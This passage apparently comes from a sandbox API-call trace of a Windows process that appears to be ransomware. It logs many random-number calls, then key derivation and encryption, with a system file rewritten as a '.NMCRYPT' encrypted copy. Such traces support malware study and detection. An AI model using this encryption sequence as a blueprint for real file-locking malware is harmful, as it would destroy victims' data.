returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.278] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.278] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.278] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0168.279] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.279] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad4b8) returned 1 [0168.279] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0168.279] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0168.279] wcslen (_String="\\\\?\\") returned 0x4 [0168.279] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad738) returned 1 [0168.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.280] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=94720) returned 1 [0168.280] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0168.280] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.281] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.281] GetLastError () returned 0x0 [0168.281] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.282] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.282] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.282] GetLastError () returned 0x0 [0168.282] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.282] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.283] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.283] GetLastError () returned 0x0 [0168.283] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.283] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.283] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.283] GetLastError () returned 0x0 [0168.283] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.283] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.283] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.283] GetLastError () returned 0x0 [0168.283] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.283] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.283] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, 